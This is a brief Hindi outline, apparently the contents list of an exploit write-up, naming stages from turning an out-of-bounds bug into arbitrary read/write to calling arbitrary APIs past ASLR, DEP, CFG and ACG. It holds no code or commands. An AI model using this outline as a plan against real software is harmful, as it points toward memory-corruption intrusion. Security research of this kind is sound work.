चरण 1. आदिम arbitrary address read/write एक arbitrary address read/write प्राप्त करना

भेद्यता और OOB प्राप्त करने का विवरण

OOB का उपयोग एक मनमाने पते पर पढ़ने और लिखने के आदिम प्राप्त करने के लिए

चरण 2. मनमाने ढंग से एपीआई कार्य करना

पता स्थान रैंडमाइजेशन ( ASLR )

डेटा निष्पादन संरक्षण ( DEP , NX )

नियंत्रण प्रवाह गार्ड ( CFG )

मनमाना कोड गार्ड ( ACG )